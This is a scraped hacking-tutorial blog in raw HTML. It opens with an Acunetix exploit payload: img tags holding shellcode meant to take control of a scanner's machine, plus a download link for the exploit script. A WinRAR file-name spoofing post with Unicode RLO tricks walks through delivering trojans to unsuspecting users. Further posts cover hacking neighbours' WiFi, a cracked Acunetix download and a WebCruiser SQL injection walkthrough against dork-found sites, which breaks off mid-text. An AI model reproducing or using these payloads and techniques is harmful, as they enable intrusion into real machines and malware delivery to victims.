class="MsoNormal" style="text-align: justify;"> </div> <blockquote class="tr_bq"> <div class="MsoNormal" style="text-align: justify;"> <code> <html> <img src="http://SQLInjection........................................ ..................................................................... ..................................................................... ............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB 0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9 JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6 LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”><br /> <img src="http://XSS................................................. ..................................................................... ..................................................................... ..."><br /> <img src="http://CSRF................................................ ..................................................................... ..................................................................... ...."><br /> <img src="http://DeepScan............................................ ..................................................................... ..................................................................... ........"><br /> <img src="http://NetworkScan......................................... ..................................................................... ..................................................................... ..........."><br /> <img src="http://DenialOfService..................................... ..................................................................... ..................................................................... ..............."><br /> </html></code></div> </blockquote> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq6ArvZ4ZUNpKhwGFIhwTlL4L6LilMT7qOqreF7-_PXmS0BA7W1zwgZT0M07_4_fjYiBLRoTlArRoIiOK7NlaMfXmqG2KaptoOg3_etky4dkQ286W4cbt1FPIeR7HXPJoJzRsuuRq8xu0/s1600/Acunetix_0day.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq6ArvZ4ZUNpKhwGFIhwTlL4L6LilMT7qOqreF7-_PXmS0BA7W1zwgZT0M07_4_fjYiBLRoTlArRoIiOK7NlaMfXmqG2KaptoOg3_etky4dkQ286W4cbt1FPIeR7HXPJoJzRsuuRq8xu0/s1600/Acunetix_0day.jpg" width="640" /></a></div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> In conclusion,</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> Following all the above, we created a powerful exploit that Newbie hackers</div> <div class="MsoNormal" style="text-align: justify;"> will definitely fall for.</div> <div class="MsoNormal" style="text-align: justify;"> This exploit will give us the ability to do everything with all that nasty Newbie hackers that scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on…</div> <div class="MsoNormal" style="text-align: justify;"> Furthermore it can be used in order to collect smart intelligence about hostile forces who want to attack our web application.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> BUT!!</div> <div class="MsoNormal" style="text-align: justify;"> The more powerful idea that motivated me to reveal this concept and POC, is the fact that this exploit is Anonymity killer! , because even if the attacker uses the most smart and secure proxy in the world, such as "TOR" and others, his ass will be revealed and full control on his scanning machine will be gained.</div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> Thanks all for reading my post, hope you enjoy it.</div> <br /> <span style="color: red;"><b>Exploit Download Link: <a href="http://an7i.net/download.php?Down=exploit.pl" target="_blank">Click Here</a></b></span><br /> <br /> <blockquote class="tr_bq"> </blockquote> </div> <div class="MsoNormal" style="text-align: justify;"> </div> <div class="MsoNormal" style="text-align: justify;"> </div> </div> <div class="MsoNormal" style="text-align: justify;"> </div> </div> </div> </div>

Hacking Tutorials Acunetix 0day

A few weeks ago I have published an article about WINRAR 0DAY. That article revealed a new vulnerability that gave attackers, the ability to perform spoofing attack. Many people wrote to me about the problems of that kind of article (for example). So…

Read more »

Joomla Remote Code Execution (RCE) 2014

<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit1rPXHGQ3waUStFfKcz1hq6cbvmrEXrefRc5bDkNZ3nFq-ijWzkcRgmxMULWgn_WlhAETNqnNHcs9m3u3O3Aib_fLJwFLgRklsK8HvUisPtwDTyzGo_mMlwWpQN2UQwhx96GrAC2jDLE/s1600/Joomla-Remote-Code-Execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit1rPXHGQ3waUStFfKcz1hq6cbvmrEXrefRc5bDkNZ3nFq-ijWzkcRgmxMULWgn_WlhAETNqnNHcs9m3u3O3Aib_fLJwFLgRklsK8HvUisPtwDTyzGo_mMlwWpQN2UQwhx96GrAC2jDLE/s1600/Joomla-Remote-Code-Execution.png" width="400" /></a></div> <br /> <span style="font-size: large;"><b><br /></b></span> <span style="font-size: small;"><b>Hay! Today i Am going to share Joomla Remote Code Execution (RCE)  2014 with you which is made by my best friend or Uncle :D Abdul Ghaffar. Here is the video tutorial:</b></span><br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <iframe allowfullscreen="allowfullscreen" frameborder="0" height="266" mozallowfullscreen="mozallowfullscreen" src="https://www.youtube.com/embed/IWPmuxiJb6k?feature=player_embedded" webkitallowfullscreen="webkitallowfullscreen" width="320"></iframe></div> <br />

Hacking Tutorials Joomla Remote Code Execution (RCE) 2014

Hay! Today i Am going to share Joomla Remote Code Execution (RCE)  2014 with you which is made by my best friend or Uncle :D Abdul Ghaffar. Here is the video tutorial: …

Read more »

WinRar File extension spoofing 0day

<div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Winrar is one of the most common application for compressing and decompressing data.<br />The application is capble of compressing data as rar or as zip format.<br />This Article is going to present a new Vulnerability that i found at WINRAR version 4.20<br />(other version maybe vulnerable to).<br /><br />Here is a quick <span class="word">brief</span> of the zip file format:</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTdHswgV-P2Q3IB8VwYHREbUAsWFLC1ZSe_j2X2DBMcwxFX8F6H9vKIZAy6d6i8bD2XihYbFONic6OHaXjqznps03UmFNl90NYDeSH4LXutJJmgLJc-4piS3LoyduIIoW8lC6Nt-SMaM/s1600/WinRar-File-extension-spoofing-0DAY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRTdHswgV-P2Q3IB8VwYHREbUAsWFLC1ZSe_j2X2DBMcwxFX8F6H9vKIZAy6d6i8bD2XihYbFONic6OHaXjqznps03UmFNl90NYDeSH4LXutJJmgLJc-4piS3LoyduIIoW8lC6Nt-SMaM/s1600/WinRar-File-extension-spoofing-0DAY.png" width="400" /></span></a></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">So by the file format descriptor, we can see that the Bits at offset 30 are referred to</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">the file name of the compressed file.</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">When we try to compress the file as "ZIP Format" with WINRAR, the file structure looks<br />the same, but! WINRAR adds several properties of its own<span dir="RTL" lang="HE">.</span></span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">For example let's look at a text file called "TEST1.txt" that contains the data "AAAAA" after</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">it compressed as zip with WINRAR:</span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_r9so8nKiyOY_c-JCL7aGEQpPfZPAXqFH74l7u78XCG2cDopRfrAs3Qcjk4kYRuyeqwh0s58QwKurWxfekBFB1pNc-D0DWcc-mC0By-71ls6YXxrKtbdE6QkMKaoz2sc354iY5JowQcw/s1600/WinRar-File-extension-spoofing-0DAY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_r9so8nKiyOY_c-JCL7aGEQpPfZPAXqFH74l7u78XCG2cDopRfrAs3Qcjk4kYRuyeqwh0s58QwKurWxfekBFB1pNc-D0DWcc-mC0By-71ls6YXxrKtbdE6QkMKaoz2sc354iY5JowQcw/s1600/WinRar-File-extension-spoofing-0DAY.png" width="640" /></span></a></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> </div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> <div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">In the example above it can be noticed that WINRAR add extra "file name" into the compressed file.</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Further analysis reveals that the <b>second</b> name is the "File Name" of the file, that WINRAR will give to</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">the output uncompressed file, while the <span style="color: lime;"><b>First</b> </span>name is the name that appears at the WINRAR GUI</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">window.</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">QUESTION: so what happens if the first name and the last name are different?</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">ANSWER:  WINRAR will show the spoofed file name, while after decompression the user will get the real file name.</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">This Behavior can easily turned into a very dangerous security hole.</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Think about a hacker that publish some informative "txt" file called "<b>ReadMe.txt</b>" or even</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">PDF like "<b>VirusTotal_ScanResults.pdf</b>" or more tempting file like"<b>My Girl Friend new bathing suit.jpg</b>".</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Think about an innocent user that will open that file and instead of getting readme file, PDF book</span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">or interesting image, he will get a nasty Trojan Horse... </span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <strong><u><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></u></strong></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <strong><u><span style="color: red; font-family: Arial, Helvetica, sans-serif; font-size: large;">So let's start and build a nasty POC</span></u></strong></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">1: First we goanna take some nasty file (just kidding) that will popup "PWNED" message.</span></div> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfjjNvPMmK_P8GLrM1AB4ZT4eF3IGBUSe8QRA_FqjC40fXLe9lbv_mBgm0N7_ecUhWL2GSZL5Dc9Amo3HGjSzNaqg3-r3tLsTkjqMpSpnNyzVBftpt8sTlBqGlohcKlaf3LeKHMwDZgi4/s1600/WinRar-File-extension-spoofing-0DAY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfjjNvPMmK_P8GLrM1AB4ZT4eF3IGBUSe8QRA_FqjC40fXLe9lbv_mBgm0N7_ecUhWL2GSZL5Dc9Amo3HGjSzNaqg3-r3tLsTkjqMpSpnNyzVBftpt8sTlBqGlohcKlaf3LeKHMwDZgi4/s1600/WinRar-File-extension-spoofing-0DAY.png" width="568" /></span></a></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"> 2: Second we will compress it with WINRAR by choosing "WINZIP" method.</span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiasxzAxVgyMk9oMG7Xuc9DZRp0nhlPqxaPS9nW2gJ-OwfWzapIqEyI1uIY74yicvFJj1jfm3cVDez8jAffUq9KToTGRdAWnBOwN_A4tvc-5jxct3eILCAbwGXLxL4noGg5TXNueQEw-Bc/s1600/WinRar-File-extension-spoofing-0DAY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiasxzAxVgyMk9oMG7Xuc9DZRp0nhlPqxaPS9nW2gJ-OwfWzapIqEyI1uIY74yicvFJj1jfm3cVDez8jAffUq9KToTGRdAWnBOwN_A4tvc-5jxct3eILCAbwGXLxL4noGg5TXNueQEw-Bc/s1600/WinRar-File-extension-spoofing-0DAY.png" width="571" /></span></a></div> <div> <span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div> </div> <div dir="LTR" style="direction: ltr; line-height: 18.200000762939453px; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">3:  Finally we  will open the ZIP file with an hex editor, change the second name only, to the fake name we chose (MyPrivateImage.jpg) and save it as ZIP file.</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYjjslnQ6NW0ctNMPeSx_J33JO2ry8ciMcQ0Jmromb33vqF2af4C6EaSjjYxHcpjoAuEedGufVzTEAB4ZooDrDgqclpDRrSMrdh1FdkCQ3tI24J7OBWR5UscdXKIMpQWA_yioBXonsxJA/s1600/WinRar-File-extension-spoofing-0DAY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="534" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYjjslnQ6NW0ctNMPeSx_J33JO2ry8ciMcQ0Jmromb33vqF2af4C6EaSjjYxHcpjoAuEedGufVzTEAB4ZooDrDgqclpDRrSMrdh1FdkCQ3tI24J7OBWR5UscdXKIMpQWA_yioBXonsxJA/s1600/WinRar-File-extension-spoofing-0DAY.png" width="640" /></span></a></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">The result will be a nasty WINRAR file that shows you an image file, when you double click it, the nasty binary file will execute:</span></div> <div class="separator" style="clear: both; text-align: center;"> </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1RdBIox5PP4KKAf7sacaw_OUhSxBWfuBgT-0fS75w6a0vwVqLMFvd1YvPRpp7Sb-TkbbaH87mT2jbg3_PeXRfbQcvfQ1YuJoK629_ArPxBvfMMC9MHmYa31hf5OCwvfdcsQ9AJ6DP92I/s1600/WinRar-File-extension-spoofing-0DAY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1RdBIox5PP4KKAf7sacaw_OUhSxBWfuBgT-0fS75w6a0vwVqLMFvd1YvPRpp7Sb-TkbbaH87mT2jbg3_PeXRfbQcvfQ1YuJoK629_ArPxBvfMMC9MHmYa31hf5OCwvfdcsQ9AJ6DP92I/s1600/WinRar-File-extension-spoofing-0DAY.png" width="548" /></span></a></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div> <div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">This by itself is a very problematic behavior of WINRAR, but what about those people<br />that aren't double clicking files from WINRAR windows?</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">yes... the  "Extract here" people  :\</span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">If they will see a file that called " MyPrivateImage.jpg " turning into  " MyPrivateImage.exe " , well.... they will start worry  :)</span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Don't be afraid, for this purpose we can combine other known vulnerability for windows.</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">This Vulnerability called "Unicode RLO Spoofing".</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">In this <span style="line-height: 18.399999618530273px;">technique we use the RLO Unicode character.</span></span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;">( Read about it here: <a href="http://www.fileformat.info/info/unicode/char/202e/index.htm" style="text-decoration: none;">http://www.fileformat.info/info/unicode/char/202e/index.htm</a> ).</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;"><br /></span> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;">This character can easily confuse windows to present the file "Fede.jpg.exe" into</span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;">"Fedexe..jpg".</span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;">Combination of these two vulnerabilities can get you the near perfect File spoofing ever</span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;">When you look at it in WINRAR, you will see FEDEX.jpg</span></div> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;">And when you extract it, you will see Fedexe..jpg</span></div> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br style="text-align: right;" /></span> <br /> <div dir="LTR" style="direction: ltr; margin: 0cm 0cm 10pt; unicode-bidi: embed; vertical-align: top;"> <span style="background-color: white; font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;">No matter where you run the file from , YOU'll GET PWNED !</span></div> </div> <div> <span style="font-family: Arial, Helvetica, sans-serif; line-height: 18.399999618530273px;"><br /></span></div> </div> <div> <span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div> </div> <div> <span style="font-family: Calibri;"><br /></span></div>

Hacking Tutorials WinRar File extension spoofing 0day

Winrar is one of the most common application for compressing and decompressing data.The application is capble of compressing data as rar or as zip format.This Article is going to present a new Vulnerability that i found at WINRAR version 4.20(other …

Read more »

WIFI Hacking 100% Working Tutorial

<div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2NUyjbCaUWZJAVFx7vv6nSxS8l8_5WzSwCJZzlwJX52ZCO9Q7jAgCrguPhFGhO2W5-6k7YCDxw8KBQkXlL8QlxLTUNyRPUB3Sctbngok9GJBGd4cyy0VkDCu_Y-dufJqkp7R0Jj2pXc4/s1600/WIFI-Hacking-100%25-Working-Tutorial.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2NUyjbCaUWZJAVFx7vv6nSxS8l8_5WzSwCJZzlwJX52ZCO9Q7jAgCrguPhFGhO2W5-6k7YCDxw8KBQkXlL8QlxLTUNyRPUB3Sctbngok9GJBGd4cyy0VkDCu_Y-dufJqkp7R0Jj2pXc4/s1600/WIFI-Hacking-100%25-Working-Tutorial.gif" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <b>Hay Guyz Here is the Tutorial for Hacking WIFI By Using KALI LINUX which is 100% Working. So enjoy by hacking wifi of your neighbours :D</b></div> <div class="separator" style="clear: both; text-align: center;"> <b><br /></b></div> <div class="separator" style="clear: both; text-align: center;"> <b>Note: If you Don't Have Kali Linux then Google it and Download it ;)</b></div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <iframe allowfullscreen="allowfullscreen" frameborder="0" height="266" mozallowfullscreen="mozallowfullscreen" src="https://www.youtube.com/embed/93AEREX5w0I?feature=player_embedded" webkitallowfullscreen="webkitallowfullscreen" width="320"></iframe></div> <span id="goog_807774943"></span><span id="goog_807774944"></span><br />

Hacking Tutorials WIFI Hacking 100% Working Tutorial

Hay Guyz Here is the Tutorial for Hacking WIFI By Using KALI LINUX which is 100% Working. So enjoy by hacking wifi of your neighbours :D Note: If you Don't Have Kali Linux then Google it and Download it ;) …

Read more »

Free Acunetix Web VulnerAbility 9 with crack + patch

Hay Guyz! Today i am going to share Acunetix Web VulnerAbility 9  with crack+patch. Hope you will like it :D<br /> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mz60AY75Y39M6EpbALdqKYkPMWQ9nNtn6KEXrT9zXtHiU_Psn-xlmA_HS-2y06Uwb7TcCb5UhAGngttEuJokAl9J1v4ChhAU2GSmSOS_R7M6Ldz-7mzGSYeavLEbsUdwzSbiK4Azi8w/s1600/Acunetix-net-Vulnerability-Scanner-9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mz60AY75Y39M6EpbALdqKYkPMWQ9nNtn6KEXrT9zXtHiU_Psn-xlmA_HS-2y06Uwb7TcCb5UhAGngttEuJokAl9J1v4ChhAU2GSmSOS_R7M6Ldz-7mzGSYeavLEbsUdwzSbiK4Azi8w/s1600/Acunetix-net-Vulnerability-Scanner-9.jpg" width="227" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <span style="color: red;"><br /></span></div> <div class="separator" style="clear: both; text-align: center;"> <b><span style="color: red; font-size: x-large;"><a href="http://www.tusfiles.net/psns2hdz1ay0" target="_blank">Download</a></span></b></div> <br />

Softwares and Apps Free Acunetix Web VulnerAbility 9 with crack + patch

Hay Guyz! Today i am going to share Acunetix Web VulnerAbility 9  with crack+patch. Hope you will like it :D Download …

Read more »

Hack A Website With WebCruiser Scanner

Hay!<br /> Today i am going to tell you a method for hacking Websites.<br /> So i will to explain in such a way so that noobs can also understand this.<br /> I will Suggest you to try to practice hacking manually not by tools Because tools will not make your skills to go high. But if you are a lazy guyz then use tools :D<br /> <br /> <br /> First Download WebCruiser Scanner<br /> Download Link: <a href="http://sec4app.com/download/WebCruiserEnt.zip" target="_blank">Click Here</a><br /> <br /> <span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 15px;">Then You will need a target that you want to hack, which  you can use Google dorks to find vulnerable websites,</span></span></span><br /> <span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 15px;"><br /></span><span style="font-size: 15px;">I will not share google dorks with you as there are thousands of Google dorks which you can find from google</span></span></span><br /> <span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 15px;"><br />  OK I found my vulnerable website:</span><span style="font-size: 15px;"> </span><span style="font-size: 15px;"><br /></span><span style="font-size: 15px;"></span></span></span><br /> <div class="codeblock" style="font-size: 15px;"> <div class="title"> <span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">Code:</span></span></div> <div class="body" dir="ltr"> <code style="background-color: white; font-size: 13px; line-height: 18px;"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.TARGETT.com/vmarket.php?id=17</span></code></div> </div> <span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /><span style="font-size: 15px;">Let's open WebCruiser Scanner and 